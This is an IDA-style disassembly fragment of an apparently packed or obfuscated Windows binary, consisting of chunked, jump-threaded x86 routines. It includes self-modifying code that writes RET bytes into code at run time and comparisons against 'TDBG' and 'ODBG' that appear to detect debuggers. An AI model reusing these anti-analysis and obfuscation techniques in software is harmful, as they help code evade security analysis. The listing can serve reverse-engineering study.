; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45512F

loc_44DFDB:				; CODE XREF: sub_45512F-18487j
		push	offset sub_45B27B
		jmp	loc_43E4A6
; END OF FUNCTION CHUNK	FOR sub_45512F

; =============== S U B	R O U T	I N E =======================================



sub_44DFE5	proc near		; DATA XREF: k2vbe3.d:0044E702o
		add	esi, 90C8829Eh
		mov	[esi], eax
		pop	esi
		lea	eax, sub_44FF97
		mov	byte ptr [eax],	0C3h
		jmp	sub_44FF97
sub_44DFE5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F817

loc_44DFFC:				; CODE XREF: sub_44F817:loc_4540C2j
		mov	byte ptr [eax],	0C3h
		jmp	sub_454BCE
; END OF FUNCTION CHUNK	FOR sub_44F817

; =============== S U B	R O U T	I N E =======================================



sub_44E004	proc near		; CODE XREF: sub_40F23F:loc_40F293p
					; sub_40F2BC:loc_40F314p ...
		call	sub_44E00F
		jmp	ds:off_41E0B8
sub_44E004	endp


; =============== S U B	R O U T	I N E =======================================



sub_44E00F	proc near		; CODE XREF: k2vbe3.d:00447F22j
					; sub_44E004p ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043F17F SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004441B1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004446C7 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044B02D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D68A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453DE7 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00455FDE SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00459233 SIZE 00000005 BYTES

		xchg	ecx, [esp-4+arg_0]
		call	sub_4518A6

loc_44E017:				; CODE XREF: k2vbe3.d:00452641j
		jmp	loc_455FDE
sub_44E00F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	ds:dword_41E1B4, eax
		push	offset sub_4540A9
		jmp	loc_457254
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456666

loc_44E02C:				; CODE XREF: sub_456666:loc_453F8Ej
		add	edx, ebp
		add	edx, 2FA49800h
		mov	edx, [edx]
		shr	edx, 3
		push	0EA3E2B57h
		pop	ecx
		jmp	loc_456B67
; END OF FUNCTION CHUNK	FOR sub_456666
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A21D

loc_44E044:				; CODE XREF: k2vbe3.d:00440E15j
					; sub_45A21D:loc_45B2E2j
		push	ecx
		push	766230A4h
		pop	ecx
		rol	ecx, 15h
		add	ecx, 3FE70CFAh
		jmp	loc_459603
; END OF FUNCTION CHUNK	FOR sub_45A21D

; =============== S U B	R O U T	I N E =======================================



sub_44E059	proc near		; DATA XREF: sub_45A323-665Co

; FUNCTION CHUNK AT 004438C7 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00444195 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450A25 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455719 SIZE 00000002 BYTES

		cmp	dword ptr [eax], 47424454h
		jz	loc_44DE55
		jmp	loc_444195
sub_44E059	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45811A

loc_44E06A:				; CODE XREF: sub_45811A+10j
		add	ebx, 0BBFEDF8Ah
		xchg	ebx, [esp+0]
		jmp	loc_443689
; END OF FUNCTION CHUNK	FOR sub_45811A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45971A

loc_44E078:				; CODE XREF: sub_45971A+Aj
		sub	eax, 0E5C55FD3h
		test	eax, 20000000h
		jmp	loc_4537F8
; END OF FUNCTION CHUNK	FOR sub_45971A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4517AE

loc_44E089:				; CODE XREF: sub_4517AE:loc_4526EAj
		push	690B5AC7h
		pop	eax
		and	eax, 0EB39FCA0h
		rol	eax, 11h
		and	eax, 9AFE885Ah
		xor	eax, 43725A4Fh
		call	sub_4553CC
		mov	ds:off_41E184, eax
		jmp	loc_459EA0
; END OF FUNCTION CHUNK	FOR sub_4517AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E88E

loc_44E0B4:				; CODE XREF: sub_43E88E:loc_45A111j
		xchg	eax, [esp+0]
		call	sub_444615
		mov	eax, 5A4FBBBh
		push	ecx
		jmp	loc_44F5E4
; END OF FUNCTION CHUNK	FOR sub_43E88E
; ---------------------------------------------------------------------------
		shr	esi, 2
		jmp	sub_43CD53
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442DA4

loc_44E0CF:				; CODE XREF: sub_442DA4+4j
		mov	ebx, ecx
		xchg	ebx, [esp+4+var_4]
		mov	esp, ebp
		push	offset sub_44D2F1
		jmp	nullsub_443
; END OF FUNCTION CHUNK	FOR sub_442DA4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D7A9

loc_44E0E0:				; CODE XREF: sub_43D7A9:loc_440983j
		add	eax, 7845344Bh
		popf
		push	eax
		push	0FFFFFFFFh
		lea	eax, [ebp-800h]
		push	eax
		jmp	loc_43F876
; END OF FUNCTION CHUNK	FOR sub_43D7A9

; =============== S U B	R O U T	I N E =======================================



sub_44E0F6	proc near		; CODE XREF: k2vbe3.d:00448779j
					; sub_449FE9:loc_4553C1p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C7A8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E41F SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0043E6A7 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043F256 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043FB6E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FC2B SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00441115 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00442390 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004425C7 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00443505 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044BC39 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044BF70 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450B94 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045247C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453C6C SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00454469 SIZE 00000028 BYTES
; FUNCTION CHUNK AT 00454A0C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00459580 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045999B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459DF5 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045BD01 SIZE 0000000D BYTES

		xchg	esi, [esp+0]
		pop	esi
		mov	esp, ebp
		pop	ebp
		mov	eax, ds:dword_444F30
		jmp	loc_43C7A8
sub_44E0F6	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_44E108:				; CODE XREF: sub_44D0D5+54B1j
		jz	loc_448D65
		jmp	loc_45A4ED
; END OF FUNCTION CHUNK	FOR sub_44D0D5
; ---------------------------------------------------------------------------

loc_44E113:				; CODE XREF: k2vbe3.d:00458D7Bj
		jo	loc_44B906
		jnz	loc_45600E
		jb	loc_444BBD

loc_44E125:				; CODE XREF: k2vbe3.d:00459CDAj
		rol	edx, 1Ah
		add	edx, 0CDD1A8h
		jmp	loc_44E6EC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456FED

loc_44E133:				; CODE XREF: sub_456FED:loc_44D3C8j
		xchg	ecx, [esp+0]
		call	sub_443A95
		mov	eax, 203AE851h
		call	sub_43C82E
		mov	ds:off_41E1F4, eax
		lea	eax, sub_456FED
		jmp	loc_44D291
; END OF FUNCTION CHUNK	FOR sub_456FED
; ---------------------------------------------------------------------------

loc_44E156:				; CODE XREF: k2vbe3.d:0045A5A5j
		xchg	ebp, [ecx]
		jmp	loc_456FCB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444D7B

loc_44E15D:				; CODE XREF: sub_444D7B:loc_442AE5j
		sub	eax, 828CC00Ah
		add	eax, 532994F3h
		xchg	eax, [esp+0]
		jmp	sub_445047
; END OF FUNCTION CHUNK	FOR sub_444D7B
; ---------------------------------------------------------------------------

loc_44E171:				; CODE XREF: k2vbe3.d:00458257j
		test	ebx, 0EA025131h
		jmp	loc_440A79
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445EB0

loc_44E17C:				; CODE XREF: sub_445EB0+3A56j
		xchg	edx, [esp+4+var_4]
		jmp	loc_455A6A
; END OF FUNCTION CHUNK	FOR sub_445EB0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B359

loc_44E184:				; CODE XREF: sub_44B359:loc_450745j
		mov	byte ptr [eax],	0C3h
		jmp	loc_449CE3
; END OF FUNCTION CHUNK	FOR sub_44B359

; =============== S U B	R O U T	I N E =======================================



sub_44E18C	proc near		; CODE XREF: sub_41A578+3Bp
					; k2vbe3.d:0044DA02j
					; DATA XREF: ...
		push	ecx
		push	offset loc_43EC4D
		jmp	nullsub_88
sub_44E18C	endp

; ---------------------------------------------------------------------------
		rol	ecx, 14h
		jmp	loc_44AC44
; ---------------------------------------------------------------------------

loc_44E19F:				; CODE XREF: k2vbe3.d:00459BCAj
		and	ebx, 0B12DE799h
		cdq

loc_44E1A6:				; CODE XREF: k2vbe3.d:loc_459BBEj
		sub	eax, 16F589CCh
		and	eax, 965970B6h
		jnz	loc_451D91
; START	OF FUNCTION CHUNK FOR sub_45BCF0

loc_44E1B8:				; CODE XREF: sub_45BCF0+Cj
		jmp	loc_445518
; END OF FUNCTION CHUNK	FOR sub_45BCF0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_44E1BD:				; CODE XREF: sub_44B912+986Bj
		jmp	nullsub_179
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BA05

loc_44E1C2:				; CODE XREF: sub_44BA05+8j
		jmp	sub_43C916
; END OF FUNCTION CHUNK	FOR sub_44BA05
; ---------------------------------------------------------------------------
		mov	esi, 0A15EBFDh
		jmp	loc_451D8B
; ---------------------------------------------------------------------------

loc_44E1D1:				; DATA XREF: sub_448A7D+902Fo
		xchg	ebx, [esp]
		mov	esi, ebx
		pop	ebx
		rol	esi, 5
		jmp	loc_44B5A3
; ---------------------------------------------------------------------------
		and	eax, 2084BA73h
		jmp	sub_447C43
; ---------------------------------------------------------------------------

loc_44E1EA:				; DATA XREF: k2vbe3.d:004550DDo
		pop	eax
		jns	loc_449D7C
		mov	eax, [esp]
		push	eax
		jmp	loc_4434C6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FB73

loc_44E1FA:				; CODE XREF: sub_43FB73:loc_454946j
		and	esi, 95725E01h
		xor	esi, 85BDA97Ch
		add	esi, ebp
		add	esi, 6A221090h
		jmp	loc_44DBEA
; END OF FUNCTION CHUNK	FOR sub_43FB73
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_240. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_44E214:				; CODE XREF: sub_44C90E:loc_455A9Aj
		and	edi, 0A57389BEh
		rol	edi, 0Ch
		add	edi, 0F3CF27Ch
		xor	edi, 37BDF280h
		xchg	edi, [esp+124h+var_124]
		push	0
		jmp	loc_4481BE
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------

loc_44E233:				; CODE XREF: k2vbe3.d:0044D792j
		jg	nullsub_139
		test	ecx, 29FCDC09h
		jmp	loc_44BF25
; ---------------------------------------------------------------------------

loc_44E244:				; CODE XREF: k2vbe3.d:loc_44B04Ej
		add	esp, 8
		mov	eax, [eax]
		push	offset loc_450C81
		jmp	loc_43FB69
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A79B

loc_44E253:				; CODE XREF: sub_44A79B:loc_444595j
		sbb	eax, ebx

loc_44E255:				; CODE XREF: k2vbe3.d:loc_44F919j
		jnz	loc_459703
		adc	ecx, 666BCBA7h
		jmp	loc_4573A0
; END OF FUNCTION CHUNK	FOR sub_44A79B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C3A9

loc_44E266:				; CODE XREF: sub_43C3A9+CCA6j
		or	eax, eax
		jnz	loc_4557BE
		jmp	loc_44A076
; END OF FUNCTION CHUNK	FOR sub_43C3A9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_44E273:				; CODE XREF: sub_43CCD0+7j
		or	edi, 0AE69D56Bh
		jnz	loc_45540E
		test	eax, edx
		jmp	loc_456C05
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458899

loc_44E286:				; CODE XREF: sub_458899+1Dj
		call	sub_44111E

loc_44E28B:				; CODE XREF: sub_451EEA:loc_4449A2j
		mov	ecx, ebp
		call	sub_44E51B
; END OF FUNCTION CHUNK	FOR sub_458899
; START	OF FUNCTION CHUNK FOR sub_44BB73

loc_44E292:				; CODE XREF: sub_44BB73+C951j
		push	esi
		mov	esi, eax
		xchg	esi, [esp+0]
		retn
; END OF FUNCTION CHUNK	FOR sub_44BB73

; =============== S U B	R O U T	I N E =======================================



sub_44E299	proc near		; CODE XREF: k2vbe3.d:loc_440E0Bp

var_4		= dword	ptr -4

		push	esi
		mov	esi, ebp
		xchg	esi, [esp+4+var_4]
		call	sub_442F64
sub_44E299	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44E2A4	proc near		; CODE XREF: sub_4501CC+19p
					; sub_457D4B:loc_450707j ...

arg_0		= dword	ptr  4
arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 004412ED SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00443291 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D26D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DA08 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044E2B7 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00455D87 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0045B5F3 SIZE 0000001A BYTES

		xchg	esi, [esp+0]
		pop	esi
		pop	esi
		lea	eax, loc_44DA08
		mov	byte ptr [eax],	0C3h

loc_44E2B2:				; CODE XREF: sub_44D59D-B3A7j
		jmp	loc_44DA08
sub_44E2A4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E2A4

loc_44E2B7:				; CODE XREF: sub_44E2A4:loc_44DA08j
		pop	edx
		mov	eax, [esp-0Ch+arg_8]
		jmp	sub_441418
; END OF FUNCTION CHUNK	FOR sub_44E2A4

; =============== S U B	R O U T	I N E =======================================



sub_44E2C0	proc near		; CODE XREF: sub_43F7AC+10996p
					; k2vbe3.d:00456A54j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044BAF9 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax

loc_44E2C4:				; CODE XREF: sub_44D0D5:loc_448D59j
		xchg	esi, [esp-4+arg_0]
		jmp	loc_44BAF9
sub_44E2C0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B20A

loc_44E2CC:				; CODE XREF: sub_45B20A-7A7Ej
		js	loc_44CB22

loc_44E2D2:				; CODE XREF: sub_45B20A:loc_442CE1j
		call	sub_43F2E0
		push	ebp
		mov	ebp, ecx
		call	sub_44881E
		mov	ds:off_41E018, eax
		lea	eax, loc_441B7A
		mov	byte ptr [eax],	0C3h
		jmp	loc_441B7A
; ---------------------------------------------------------------------------

loc_44E2F3:				; CODE XREF: sub_45B20A:loc_441B7Aj
		xchg	esi, [esp+0]
		mov	edx, esi
; END OF FUNCTION CHUNK	FOR sub_45B20A
; START	OF FUNCTION CHUNK FOR sub_441409

loc_44E2F8:				; CODE XREF: sub_441409:loc_44824Aj
		pop	esi
		mov	eax, [esp-4+arg_0]
		jmp	loc_44FB8E
; END OF FUNCTION CHUNK	FOR sub_441409
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457DCA

loc_44E301:				; CODE XREF: sub_457DCA-15372j
		or	ebp, ecx

loc_44E303:				; CODE XREF: sub_457DCA:loc_442014j
		push	0CEC4B6F4h
		pop	eax
		add	eax, 6766FA2h

loc_44E30F:				; CODE XREF: k2vbe3.d:loc_44E9F6j
		xor	eax, 0AAD90153h
		jmp	loc_453DF2
; END OF FUNCTION CHUNK	FOR sub_457DCA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45000F

loc_44E31A:				; CODE XREF: sub_45000F+7213j
		add	ecx, esi
		jmp	loc_44B54C
; END OF FUNCTION CHUNK	FOR sub_45000F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DF16

loc_44E321:				; CODE XREF: sub_44DF16+Ej
		jnz	loc_43E565
		jmp	loc_43C9EF
; END OF FUNCTION CHUNK	FOR sub_44DF16
; ---------------------------------------------------------------------------
		shl	edi, 1Eh
		jmp	sub_4502BA
; ---------------------------------------------------------------------------
		and	edi, 1C38E622h
		jmp	loc_45985B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_44E33F:				; CODE XREF: sub_44D0D5-471Ej
		call	sub_45BD87

loc_44E344:				; CODE XREF: sub_43F73B+1240Bj
		jmp	loc_43F833
; END OF FUNCTION CHUNK	FOR sub_44D0D5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D419

loc_44E349:				; CODE XREF: sub_44D419+182Cj
		jmp	sub_4427BF
; END OF FUNCTION CHUNK	FOR sub_44D419

; =============== S U B	R O U T	I N E =======================================



sub_44E34E	proc near		; CODE XREF: sub_44662B-9A5Cp
					; k2vbe3.d:0045A04Aj

arg_0		= dword	ptr  4

		xchg	edx, [esp+0]
		pop	edx
		add	ecx, 1CF87EAAh
		xchg	ecx, [esp-4+arg_0]
		jmp	sub_43C206
sub_44E34E	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44E360	proc near		; CODE XREF: k2vbe3.d:00441FC7j
					; sub_4529E2-EE36p

arg_0		= dword	ptr  4

		xchg	edi, [esp+0]
		pop	edi
		xchg	ebx, [esp-4+arg_0]
		push	offset loc_448351
		jmp	nullsub_89
sub_44E360	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448113

loc_44E371:				; CODE XREF: sub_448113+6j
		mov	[ebp+var_8], eax
		add	edx, ebx
		rol	edx, 5
		xor	edx, ecx
		rol	edx, 5
		add	edx, eax
		rol	edx, 5
		jmp	loc_4512D8
; END OF FUNCTION CHUNK	FOR sub_448113

; =============== S U B	R O U T	I N E =======================================



sub_44E388	proc near		; CODE XREF: sub_445541+6p
					; k2vbe3.d:00453DA2j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044454D SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004445BC SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044BBFF SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00450A59 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455B76 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00456D51 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457D0C SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	0E4A97E78h
		pop	eax
		sub	eax, ds:4000EBh
		jmp	loc_4445BC
sub_44E388	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44E39D	proc near		; DATA XREF: sub_448E56:loc_44FCA0o

; FUNCTION CHUNK AT 0044742D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044808D SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044CAE4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457801 SIZE 0000000B BYTES

		push	edx
		push	ecx
		and	ebx, edx
		jb	loc_44808D
		jmp	loc_44742D
sub_44E39D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44E3AC:				; CODE XREF: k2vbe3.d:loc_451C62j
		or	eax, 3A09DFAAh
		add	eax, 40870402h
		xchg	eax, [esp]
		jmp	loc_43C433
; ---------------------------------------------------------------------------
		push	esi
		mov	esi, ebx
		xchg	esi, [esp]
		jmp	loc_44A9CB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_44E3CB:				; CODE XREF: sub_43F7AC:loc_458373j
		adc	ebx, 78BC74F4h

loc_44E3D1:				; CODE XREF: sub_4467A1:loc_441FB9j
		lea	eax, [ebp-2BBh]
		cmp	dword ptr [eax], 4742444Fh
		jz	loc_44DE55
		jmp	loc_452210
; END OF FUNCTION CHUNK	FOR sub_43F7AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454F9F

loc_44E3E8:				; CODE XREF: sub_454F9F+7275j
		sbb	ebp, ebx
		jmp	loc_453900
; END OF FUNCTION CHUNK	FOR sub_454F9F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445124

loc_44E3EF:				; CODE XREF: sub_445124+A3EFj
		add	eax, 28h
		push	edx
		call	sub_44FEF3

loc_44E3F8:				; CODE XREF: sub_45C27A-6660j
		jmp	nullsub_286
; END OF FUNCTION CHUNK	FOR sub_445124
; ---------------------------------------------------------------------------
		call	sub_44D6B7
; START	OF FUNCTION CHUNK FOR sub_459A9E

loc_44E402:				; CODE XREF: sub_459A9E+Dj
		jmp	sub_45B20A
; END OF FUNCTION CHUNK	FOR sub_459A9E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_44E407:				; CODE XREF: sub_44B912+BC3Fj
		jmp	loc_44DF90
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------

loc_44E40C:				; CODE XREF: k2vbe3.d:00455CBCj
		jmp	loc_458430
; ---------------------------------------------------------------------------

loc_44E411:				; CODE XREF: k2vbe3.d:0044A534j
		jmp	locret_447D7A
; ---------------------------------------------------------------------------

loc_44E416:				; CODE XREF: k2vbe3.d:loc_44CAEEj
					; k2vbe3.d:00454BB8j
		lea	eax, [ebp-24h]
		push	eax
		push	4
		push	82767F4Fh
		pop	eax
		add	eax, 0CC3221Fh
		jmp	loc_45A51D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_44E42D:				; CODE XREF: sub_440C94+Ej
		pop	edi
		rol	esi, 10h
		cmp	esi, 48CC4CF7h
		jmp	loc_450005
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C82E

loc_44E43C:				; CODE XREF: sub_43C82E:loc_448665j
		jnb	loc_451EAD
		xchg	edi, ebp
		jmp	sub_4443DD
; END OF FUNCTION CHUNK	FOR sub_43C82E
; ---------------------------------------------------------------------------

loc_44E449:				; CODE XREF: k2vbe3.d:00454794j
		sub	ebx, esi
; START	OF FUNCTION CHUNK FOR sub_442C22

loc_44E44B:				; CODE XREF: sub_442C22:loc_45477Bj
		add	eax, 0F5B68919h
		push	edx
		pushf
		push	0E9746F9Eh
		pop	edx
		jmp	loc_452705
; END OF FUNCTION CHUNK	FOR sub_442C22
; ---------------------------------------------------------------------------

loc_44E45E:				; DATA XREF: sub_4426DF+176F9o
		push	0F99559B6h
		pop	edx
		add	edx, 0E83D7D62h
		rol	edx, 14h
		add	edx, 27EC722Ch
; START	OF FUNCTION CHUNK FOR sub_4570C0

loc_44E473:				; CODE XREF: sub_4570C0:loc_4424FBj
		jmp	loc_442291
; END OF FUNCTION CHUNK	FOR sub_4570C0

; =============== S U B	R O U T	I N E =======================================



sub_44E478	proc near		; DATA XREF: sub_43F34C+1A419o
		push	esi
		pop	ebp
		pop	esi
		retn
sub_44E478	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507E3

loc_44E47C:				; CODE XREF: sub_4507E3-A2C5j
		jmp	loc_44CDFD
; END OF FUNCTION CHUNK	FOR sub_4507E3

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_44E481	proc near		; CODE XREF: sub_4507E3:loc_43E101j
					; k2vbe3.d:0043F8EFp ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044036F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443A7E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044549E SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044614F SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00447B18 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044F068 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044F36E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00450225 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004514D8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045387B SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00454766 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045699A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A71B SIZE 0000001F BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		mov	[ebp+var_4], eax
		jmp	loc_44549E
sub_44E481	endp


; =============== S U B	R O U T	I N E =======================================



sub_44E48D	proc near		; DATA XREF: sub_458951+Co

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 004589E5 SIZE 0000000E BYTES

		mov	eax, [esp+0]
		push	edx
		push	ebx
		push	25E5EA6Fh
		pop	ebx
		rol	ebx, 7
		add	ebx, 704AD682h
		xor	ebx, 0AD87343Fh
		jmp	loc_4589E5
sub_44E48D	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453AE8

loc_44E4AC:				; CODE XREF: sub_453AE8-7B67j
		jnp	loc_458EFC

loc_44E4B2:				; CODE XREF: sub_453AE8:loc_44E5BBj
		call	sub_44B4E4
		mov	edx, 0F9A79DECh

loc_44E4BC:				; CODE XREF: sub_4424CF:loc_44FC56j
		push	edi
		jmp	loc_45B5C3
; END OF FUNCTION CHUNK	FOR sub_453AE8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_44E4C2:				; CODE XREF: sub_45A323:loc_441C9Dj
		mov	ds:dword_458BDC, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F64

loc_44E4C9:				; CODE XREF: sub_442F64+BCC8j
		rol	eax, 11h
		push	eax
		retn
; END OF FUNCTION CHUNK	FOR sub_442F64

; =============== S U B	R O U T	I N E =======================================



sub_44E4CE	proc near		; CODE XREF: k2vbe3.d:loc_440E05p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00452F42 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454657 SIZE 0000000D BYTES

		push	ecx
		mov	ecx, esi
		jmp	loc_452F42
sub_44E4CE	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_156. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44E4D7:				; CODE XREF: k2vbe3.d:00444EBAj
		push	esi
		push	0F615EA46h
		pop	esi
		add	esi, 0AFC37DD9h
		xor	esi, 4BADE81Ch
		jmp	loc_45A377
; ---------------------------------------------------------------------------
		mov	ds:off_41E088, eax
		lea	eax, loc_44041F
		mov	byte ptr [eax],	0C3h
		jmp	loc_44041F

; =============== S U B	R O U T	I N E =======================================



sub_44E503	proc near		; CODE XREF: sub_4033CB+AAp
					; sub_404C4E+B9p ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00447DEE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449055 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044955D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00449FA3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004541AC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458460 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459492 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00459A25 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A8FB SIZE 00000015 BYTES

		push	ebx
		push	3CB4CDACh
		pop	ebx
		or	ebx, 364F7E26h
		jmp	loc_447DEE
sub_44E503	endp

; ---------------------------------------------------------------------------

loc_44E515:				; CODE XREF: k2vbe3.d:00441A17j
		jle	sub_448472

; =============== S U B	R O U T	I N E =======================================



sub_44E51B	proc near		; CODE XREF: sub_458899-A60Cp

arg_0		= dword	ptr  4

		xchg	esi, [esp+0]
		pop	esi
		xchg	ecx, [esp-4+arg_0]
		jmp	loc_443317
sub_44E51B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C82E

loc_44E527:				; CODE XREF: sub_43C82E+15j
		or	edx, 66C32D75h
		add	edx, 1961E93Bh
		mov	edx, [edx]
		or	edx, edx
